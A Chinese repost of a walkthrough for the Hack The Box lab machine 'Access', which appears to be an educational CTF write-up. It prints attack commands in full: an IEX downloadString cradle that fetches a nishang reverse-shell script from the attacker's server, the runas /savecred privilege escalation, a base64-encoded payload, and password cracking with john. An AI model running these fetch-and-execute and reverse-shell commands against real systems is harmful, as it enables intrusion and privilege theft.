当前位置:首页 > 网络黑客 > 正文内容

【HTB系列】靶机Access的渗透测试详解

访客4年前 (2021-04-04)网络黑客832

Hack The Box是一个CTF挑战靶机平台,在线渗透测试平台。它能帮助你提升渗透测试技能和黑盒测试技能,它包含了一些不断更新的挑战,其中有模拟真实世界场景,也有倾向于CTF风格的挑战。

https://www.hackthebox.eu/

平台上有很多靶机,从易到难,黑客每入侵一台机器都会获得相应积分,通过积分排名设有名人堂。今天要实验的是靶机Access。

一、获取普通用户权限

首先我们用nmap探测下靶机的信息。
nmap -sC -sV -T5 10.10.10.98
可以看到靶机开放了21,23,80端口。telnet后面有一个?说明nmap也不确定是否为telnet。这里我用msf来探测下FTP是否允许 匿名登陆,使用msf的/auxiliary/scanner/ftp/anonymous模块。

FTP是运行匿名登陆的,那我们进行远程登陆FTP看看有什么东西。
这里我用wget递归下载FTP文件。

wget -m ftp://anonymous:anonymous@10.10.10.98

发现报错 无法启动PASV传输,那我们加个 --no-passive 使用FTP的被动模式。

wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98

下载成功!同样我们试下Telnet是否能匿名登陆。

不存在匿名登陆,但是我也确定了23这个端口的是telnet,接下来在访问下80端口。

我们download下这个图片看看这个图片是否存在隐藏的信息。

先用exiftool查看是否存在图片的其他信息。

好像并没有什么额外的信息,再用strings查找下图片的二进制里面是否有字符串

strings out.jpg

也没有发现什么额外的信息,那我们接下来用gobuster进行目录的爆破。

gobuster -u http://10.10.10.98 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

经过了挺久的时间,没爆破出什么有用的信息。我们去看下刚刚从FTP下载来的文件,先解压Engineer目录下的Access Control.Zip文件。

发生了一个错误,还7z来进行解压。

7z x Access\ Control.zip

发现ZIP是需要密码的,随便输入个密码报错,我们用7z 的l命令下的slt命令。
7z l -slt Access\ Control.zip

参数说明:

l:用于显示压缩文件的信息

Slt:属于l下的子命令用来显示压缩文件的技术信息

压缩文件使用AES-256 Deflate进行加密的,我们把密码的HASH提取出来到时候破解用。

zip2john Access\ Control.zip > Access\ Control.hash

我们在看下另一个文件。

是一个access的数据库文件,里面应该会出现用于解压压缩文件的密码。你可以用工具打开查看里面的数据一个一个找找到需要的密码。

还有一个更快捷的方法,因为密码最低就是8位的,我们用过strings方法把mdb用二进制文件的形式打开,然后只输出内容大于等于8的内容,在把这些内容输出成一个wordlist用来破解压缩文件。
strings -n 8 backup.mdb | sort -u > https://www.freebuf.com/articles/Engineer/wordlist
strings输出的内容通过sort的-u参数去重,然后在输出到文件里面。

然后我们利用john开始破解


破解成功,这里可能不好找到密码可以用这条命令显示破解出的密码。

john Access\ Control.hash --show

密码: access4u@security

那接下来我们去解压压缩文件。

解压成功!!!

我们用file看下这个.pst是什么文件

是一个outlook的个人文件夹。我们用readpst来读取下,然后目录下面会多出一个Access Control.mbox文件。

我们用

less Access Control.mbox

可以看到security的密码:4Cc3ssC0ntr0ller。我们用获得凭证去登陆telnet。

Security:4Cc3ssC0ntr0ller

登陆成功!然后CD到桌面查看user.txt即可得到user的flag。

二、获取管理员权限

接下来就是怎么得到管理员权限,测试下powershell是否能正常工作。

powershell正常的,那我们本地搭建一个简易的HTTP服务器放上我们的powershell反弹shell脚本,让靶机进行远程下载执行反弹一个shell。

这里用nishang 这是一个基于Powershell的攻击框架,项目地址: https://github.com/samratashok/nishang。

我们新建一个 www目录 然后把nishang里面需要用的脚本copy进去。
cp ~/HTB/Access/nishang/Shells/Invoke-PowerShellTcp.ps1 ~/HTB/Access/www/nishang.ps1

然后vi下编辑这个nishang.ps1,在最底下加上这行命令

Invoke-PowerShellTcp -Reverse -IPAddress 你的IP地址 -Port 监听端口

然后我们用nc 监听9001

接着用python开启HTTP服务器

然后在目标靶机telnet上执行这段代码,就是远程执行powershell脚本。

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.13.147:8000/nishang.ps1')"

之后就会反弹一个shell

接下来我们在上传一个脚本用来检测Windows系统以提升权限。

JAWS:https://github.com/411Hall/JAWS

我们在刚刚反弹的shell中去执行这个脚本,来检测目标系统的信息。

IEX(New-Object Net.WebClient).downloadString('http:// 10.10.13.147:8000/jaws-enum.ps1')

执行完成后会返回一系列信息,然后在这里查找有关信息,这里我只截取凭证部分。

上面是电脑中存储的凭证。当然你也可以用cmdkey /list 也会出现相关信息。

在查找的过程中我在公共用户的目录里面找到一个快捷连接。

百度下具体信息。

用type查看下内容,发现一些关键信息

Runas并且带有/savecred ,Runas的介绍:https://blog.csdn.net/nzjdsds/article/details/88312910。
这个就可以成为我们的利用点,但是用type获得信息杂乱无章,我们需用另一种方法来获得更为详细的整洁的输出。这里我们用script脚本的创建快捷方式实现。

$WScript=New-Object -ComObject Wscript.Shell

$shortcut=Get-ChildItem *.lnk

$Wscript.CreateShortcut($shortcut)

这里WScript用来绑定Wscript.Shell的,然后Get-ChildItem *.lnk 就是跟dir差不多找出后缀为.lnk文件(效果图如下)。

然后我们调用Wscript的CreateShortcut函数创建快捷方式来查看里面的lnk里面的详细信息。

这里我要说一下就是这里创建的快捷方式是存在内存里面的,在调用这个函数的SAVE函数之前,这个快捷方式是存在内存里面的,我们只是需要这个ZKAccess3.5Security System.lnk里面的详细工整的信息只是通过这个方式查看而已。

在这里面我们可以很清楚的看到runas 并且带有savecred 参数。所以这边我们runas的话可以不需要用户的凭证。

但是runas之后没有任何报错,但是命令也没有执行成功,应该是编码的问题。接下来我们主要就是在这个shell中在runas反弹一个管理员权限的shell。

我们先在自己的Kali中监听9002,然后把我们之前用于反弹的nishang.ps1重新复制一份为nishang2.ps1并编辑下把nishang2.ps1把监听的端口改为9002

【这里由于靶机不是一天之内完成并写好文章的,所以自己的IP地址后来变成10.10.12.114】
runas /user:ACCESS\Administrator /savecred "powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.12.114:8000/nishang2.ps1')""

这里我换了一种格式写,发现我的python HTTP服务器出现了响应,但是9002并没有返回shell。在这里猜测可能是编码的问题,windows和linux采用的编码不一样,所以我们的命令需要转换成windows能够识别的编码,这里我们用iconv和base64。

这里转码要用UTF-16LE。

echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.12.114:8000/nishang2.ps1')" | iconv --to-code UTF-16LE | base64 -w 0

输出内容:

然后我们执行下:

然后发现9002端口得到shell说明执行成功

到root的flag。

作者:是大方子?

MS08067实验室官网:www.ms08067.com

公众号:" Ms08067安全实验室"

Ms08067安全实验室目前开放知识星球: WEB安全攻防,内网安全攻防,Python安全攻防,KALI Linux安全攻防,二进制逆向入门

最后期待各位小伙伴的加入!

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/107567.html

分享给朋友:

“【HTB系列】靶机Access的渗透测试详解” 的相关文章

奥运会遭到俄罗斯黑客攻击!黑客攻击微信聊天记录

人民网2021年8月13日02:28:03的消息,黑客攻击微信聊天记录 东京奥运会惨遭俄罗斯黑客攻击! 英国国家网络安全中心日前揭露了一项惊人的黑客计划:俄罗斯军事情报部门曾准备对原定今夏举办的东京奥林匹克运动会和残奥会发起网络攻击。据悉,其攻击目标涵盖赛事组织者、后勤公司和赞助商。 打开百...

【干货知识】高級不断渗透第八季-demo就是远程控制

本季度是《高級不断渗透-第七季demo的发展》的持续。 点一下文尾左下角“阅读”可阅读文章第七季文章正文。 在第一季有关后门中,文章内容提及再次编译程序notepad ,来引入有目标源代码后门结构。 在第六季有关后门中,文章内容假定不在获知notepad 的源代码,来引入无目标源代码沟...

网咖加盟店排行榜(网吧加盟有什么牌子)

杰拉,网咖的话有网鱼、现在年轻人都喜欢看动漫,而网咖可以做到吃喝玩乐于一体,会业务人员跟你联系,连锁加盟要看品牌的影响力和运营能力,其实武汉的网咖还是蛮多的,有直营店。 这是选择加盟模式非常重要的地方,http/wgoldenkccn/网吧showneasp?NewsID=158网吧连锁的管理方案简...

我老公老是让他家的亲戚来我家,我该怎么办?请各位帮我想想办法,我

我老公老是让他家的亲戚来我家,我该怎么办?请各位帮我想想办法,我 请各位帮我想想办法,开网店怎么找女装货源唔爱神起助您成就财富人生,想做微商?想开实体店?想开淘宝店?什么才是你创业的最重要步骤?货源!想在微商卖童装母婴用品纸尿裤女装,开童装女装店铺,你去哪里找最好的货源?如何找童装女装一手货源呢?...

苹果笔记本19款air参数_133英寸是多少厘米

Macbook Air厚度分为两个版本,1366x768;CPU型号:Intel酷睿i52467M;CPU主频,2010年10月,Touch Bar位于键盘上方,宽169点5毫米6点6英寸长240毫米。 4款,长240毫米9点4英寸。12寸。 MacBook Air相关尺寸,133扩展:苹果MacB...

如厕阅读-如厕时读书看报有哪些坏处?

如厕阅读-如厕时读书看报有哪些坏处? 读书、看报兼如厕,不少人有这样的习惯。然而这一习惯非常不好。蹲厕时读书看报,会干扰大脑对排便传导神经的指挥,延长排便时间。现代医学研究证实,蹲厕超过3分钟即可直接导致直肠静脉曲张淤血,易诱发痔疮,且病情的轻重与时间长短有关。蹲厕时间越长,发病几率越高。因为久蹲...

评论列表

蓝殇清淮
3年前 (2022-06-07)

,然后只输出内容大于等于8的内容,在把这些内容输出成一个wordlist用来破解压缩文件。strings -n 8 backup.mdb | sort -u > https://www.freebuf.com/articles/Engineer/wordliststrings输出的内容

澄萌十鸦
3年前 (2022-06-07)

r /savecred "powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.12.114:8000/nishang2.ps1')""这里我

馥妴婉绾
3年前 (2022-06-07)

as 并且带有savecred 参数。所以这边我们runas的话可以不需要用户的凭证。但是runas之后没有任何报错,但是命令也没有执行成功,应该是编码的问题。接下来我们主要就是在这个shell中在runas反弹一个管理员权限的shell。我们先在自己

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。